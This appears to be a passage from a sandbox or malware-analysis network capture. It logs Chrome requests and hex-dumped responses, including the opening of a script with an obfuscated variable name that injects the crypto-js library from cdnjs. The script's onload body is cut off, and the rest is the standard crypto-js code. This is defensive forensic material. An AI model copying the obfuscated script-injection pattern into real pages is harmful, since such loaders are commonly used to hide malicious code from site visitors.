                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:01 UTC196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 19:13:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/javascript;charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:01 UTC1996INData Raw: 37 63 30 0d 0a 20 20 20 20 76 61 72 20 53 46 53 62 41 7a 61 6a 55 53 5a 5a 42 6e 6e 79 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0d 0a 53 46 53 62 41 7a 61 6a 55 53 5a 5a 42 6e 6e 79 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72 63 22 2c 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 63 72 79 70 74 6f 2d 6a 73 2f 34 2e 30 2e 30 2f 63 72 79 70 74 6f 2d 6a 73 2e 6d 69 6e 2e 6a 73 22 29 3b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 28 53 46 53 62 41 7a 61 6a 55 53 5a 5a 42 6e 6e 79 29 3b 0d 0a 53 46 53 62 41 7a 61 6a 55 53 5a 5a 42 6e 6e 79 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 7c0 var SFSbAzajUSZZBnny = document.createElement("script");SFSbAzajUSZZBnny.setAttribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");document.head.append(SFSbAzajUSZZBnny);SFSbAzajUSZZBnny.onload=function()


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2192.168.2.449742104.17.25.144431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:01 UTC526OUTGET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: cdnjs.cloudflare.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:01 UTC926INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 19:13:01 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=30672000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: W/"5eb03e2d-bb78"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Mon, 04 May 2020 16:09:17 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              cf-cdnjs-via: cfworker/kv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 459300
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Expires: Sun, 28 Sep 2025 19:13:01 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g5Xe6rMK0QU948TzvhAqJjouzaKNr%2FMErf9sMf7RsQ693CJraBkSYYn68tBG34%2BdfcFoDm1v3OJtsq2VsPcstlhxdCGUfwAJ6vOOmMzegrPrLyEoidsGURkFXWFZLDYL2KVijRke"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=15780000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              CF-RAY: 8cf8721f88cf8c7b-EWR
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:01 UTC443INData Raw: 37 62 66 39 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 2c 74 2c 65 2c 72 2c 69 2c 6e 2c 66 2c 6f 2c 73 2c 63 2c 61 2c 6c 2c 64 2c 6d 2c 78 2c 62 2c 48 2c 7a 2c 41 2c 75 2c 70 2c 5f 2c 76 2c 79 2c 67 2c 42 2c 77 2c 6b 2c 53 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 2c 4b 2c 58 2c 4c 2c 6a 2c 4e 2c 54 2c 71 2c 5a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 7bf9!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:01 UTC1369INData Raw: 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 26 26 28 74 3d 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 26 26 28 74 3d 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 74 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 69 28 29 7b 69 66 28 74 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 74 2e 67
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:01 UTC1369INData Raw: 34 2a 38 26 32 35 35 3b 65 5b 69 2b 6f 3e 3e 3e 32 5d 7c 3d 73 3c 3c 32 34 2d 28 69 2b 6f 29 25 34 2a 38 7d 65 6c 73 65 20 66 6f 72 28 6f 3d 30 3b 6f 3c 6e 3b 6f 2b 3d 34 29 65 5b 69 2b 6f 3e 3e 3e 32 5d 3d 72 5b 6f 3e 3e 3e 32 5d 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 73 69 67 42 79 74 65 73 2b 3d 6e 2c 74 68 69 73 7d 2c 63 6c 61 6d 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 77 6f 72 64 73 2c 65 3d 74 68 69 73 2e 73 69 67 42 79 74 65 73 3b 74 5b 65 3e 3e 3e 32 5d 26 3d 34 32 39 34 39 36 37 32 39 35 3c 3c 33 32 2d 65 25 34 2a 38 2c 74 2e 6c 65 6e 67 74 68 3d 6c 2e 63 65 69 6c 28 65 2f 34 29 7d 2c 63 6c 6f 6e 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 73 2e 63 6c 6f 6e 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 4*8&255;e[i+o>>>2]|=s<<24-(i+o)%4*8}else for(o=0;o<n;o+=4)e[i+o>>>2]=r[o>>>2];return this.sigBytes+=n,this},clamp:function(){var t=this.words,e=this.sigBytes;t[e>>>2]&=4294967295<<32-e%4*8,t.length=l.ceil(e/4)},clone:function(){var t=s.clone.call(this);re
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:01 UTC1369INData Raw: 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 6c 2e 63 65 69 6c 28 73 29 3a 6c 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 61 3d 6c 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 63 3b 68 2b 3d 6f 29 74 68 69 73 2e 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 28 69 2c 68 29 3b 65 3d 69 2e 73 70 6c 69 63 65 28 30 2c 63 29 2c 72 2e 73 69
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?l.ceil(s):l.max((0|s)-this._minBufferSize,0))*o,a=l.min(4*c,n);if(c){for(var h=0;h<c;h+=o)this._doProcessBlock(i,h);e=i.splice(0,c),r.si
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:01 UTC1369INData Raw: 36 2c 74 2b 3d 72 3c 3c 38 2c 74 2b 3d 69 7d 65 6c 73 65 20 74 2b 3d 31 3c 3c 32 34 3b 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 66 74 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 66 74 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 66 74 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 6,t+=r<<8,t+=i}else t+=1<<24;return t}function Rt(){for(var t=this._X,e=this._C,r=0;r<8;r++)ft[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<ft[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<ft[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:01 UTC1369INData Raw: 36 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 35 5d 3e 3e 3e 30 3c 77 74 5b 35 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 37 5d 3d 65 5b 37 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 36 5d 3e 3e 3e 30 3c 77 74 5b 36 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 74 68 69 73 2e 5f 62 3d 65 5b 37 5d 3e 3e 3e 30 3c 77 74 5b 37 5d 3e 3e 3e 30 3f 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 2c 73 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 2c 63 3d 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 3b 6b 74 5b 72 5d 3d 73 5e 63 7d 74 5b 30 5d 3d 6b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 6]+1295307597+(e[5]>>>0<wt[5]>>>0?1:0)|0,e[7]=e[7]+3545052371+(e[6]>>>0<wt[6]>>>0?1:0)|0,this._b=e[7]>>>0<wt[7]>>>0?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16,s=((n*n>>>17)+n*o>>>15)+o*o,c=((4294901760&i)*i|0)+((65535&i)*i|0);kt[r]=s^c}t[0]=k
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:01 UTC1369INData Raw: 2c 6e 2b 2b 7d 72 65 74 75 72 6e 20 68 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 30 31 32 33 34 35 36 37 38 39 2b 2f 3d 22 7d 2c 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6e 3d 74 2e 61 6c 67 6f 2c 48 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 30 3b 74 3c 36 34 3b 74 2b 2b 29 48 5b 74 5d 3d 34 32 39 34 39 36 37 32 39 36 2a 6c 2e 61 62 73 28 6c 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 76 61 72 20 6f 3d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ,n++}return h.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="},function(l){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,n=t.algo,H=[];!function(){for(var t=0;t<64;t++)H[t]=4294967296*l.abs(l.sin(t+1))|0}();var o=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:01 UTC1369INData Raw: 2c 39 2c 48 5b 32 39 5d 29 2c 78 3d 41 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 34 2c 48 5b 33 30 5d 29 2c 53 3d 43 28 53 2c 6d 3d 41 28 6d 2c 78 2c 62 2c 53 2c 67 2c 32 30 2c 48 5b 33 31 5d 29 2c 78 2c 62 2c 66 2c 34 2c 48 5b 33 32 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 70 2c 31 31 2c 48 5b 33 33 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 79 2c 31 36 2c 48 5b 33 34 5d 29 2c 6d 3d 43 28 6d 2c 78 2c 62 2c 53 2c 77 2c 32 33 2c 48 5b 33 35 5d 29 2c 53 3d 43 28 53 2c 6d 2c 78 2c 62 2c 63 2c 34 2c 48 5b 33 36 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 6c 2c 31 31 2c 48 5b 33 37 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 36 2c 48 5b 33 38 5d 29 2c 6d 3d 43 28 6d 2c 78 2c 62 2c 53 2c 76 2c 32 33 2c 48 5b 33 39 5d 29 2c 53 3d 43 28 53 2c 6d 2c 78
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ,9,H[29]),x=A(x,b,S,m,u,14,H[30]),S=C(S,m=A(m,x,b,S,g,20,H[31]),x,b,f,4,H[32]),b=C(b,S,m,x,p,11,H[33]),x=C(x,b,S,m,y,16,H[34]),m=C(m,x,b,S,w,23,H[35]),S=C(S,m,x,b,c,4,H[36]),b=C(b,S,m,x,l,11,H[37]),x=C(x,b,S,m,u,16,H[38]),m=C(m,x,b,S,v,23,H[39]),S=C(S,m,x
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:01 UTC1369INData Raw: 2e 5f 68 61 73 68 2e 63 6c 6f 6e 65 28 29 2c 74 7d 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 7a 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 72 7c 7e 65 26 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 41 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 69 7c 72 26 7e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 43 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 5e 72 5e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 44 28 74 2c 65 2c 72 2c 69 2c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ._hash.clone(),t}});function z(t,e,r,i,n,o,s){var c=t+(e&r|~e&i)+n+s;return(c<<o|c>>>32-o)+e}function A(t,e,r,i,n,o,s){var c=t+(e&i|r&~i)+n+s;return(c<<o|c>>>32-o)+e}function C(t,e,r,i,n,o,s){var c=t+(e^r^i)+n+s;return(c<<o|c>>>32-o)+e}function D(t,e,r,i,
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:01 UTC1369INData Raw: 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6f 3d 74 2e 61 6c 67 6f 2c 73 3d 5b 5d 2c 42 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 6e 2e 73 71 72 74 28 74 29 2c 72 3d 32 3b 72 3c 3d 65 3b 72 2b 2b 29 69 66 28 21 28 74 25 72 29 29 72 65 74 75 72 6e 3b 72 65 74 75 72 6e 20 31 7d 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 72 65 74 75 72 6e 20 34 32 39 34 39 36 37 32 39 36 2a 28 74 2d 28 30 7c 74 29 29 7c 30 7d 66 6f 72 28 76 61 72 20 72 3d 32 2c 69 3d 30 3b 69 3c 36 34 3b 29 74 28 72 29 26 26 28 69 3c 38 26 26 28 73 5b 69 5d 3d 65 28 6e 2e 70 6f 77 28 72 2c 2e 35 29 29 29 2c 42 5b 69 5d 3d 65 28 6e 2e 70 6f 77 28 72 2c 31 2f 33 29 29 2c 69 2b 2b 29 2c 72 2b 2b 7d 28
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ordArray,i=e.Hasher,o=t.algo,s=[],B=[];!function(){function t(t){for(var e=n.sqrt(t),r=2;r<=e;r++)if(!(t%r))return;return 1}function e(t){return 4294967296*(t-(0|t))|0}for(var r=2,i=0;i<64;)t(r)&&(i<8&&(s[i]=e(n.pow(r,.5))),B[i]=e(n.pow(r,1/3)),i++),r++}(


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              3192.168.2.449744104.17.25.144431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:02 UTC386OUTGET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: cdnjs.cloudflare.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:02 UTC926INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 19:13:02 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=30672000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: W/"5eb03e2d-bb78"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Mon, 04 May 2020 16:09:17 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              cf-cdnjs-via: cfworker/kv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 459301
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Expires: Sun, 28 Sep 2025 19:13:02 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a2oFVwZOUziAUdKPvOCEOpBsC1SeQ6jdI7Bm4hfeWh970XV7vHqUuhZGXFDsnpNxvoVDsgiOc6evkjbAB291z8fE%2F8XqVEzoqxd%2Bql2UrQf8bRSOX4kZi9gf1E2IUue7ESSvTTBu"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=15780000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              CF-RAY: 8cf872243fca0ca5-EWR
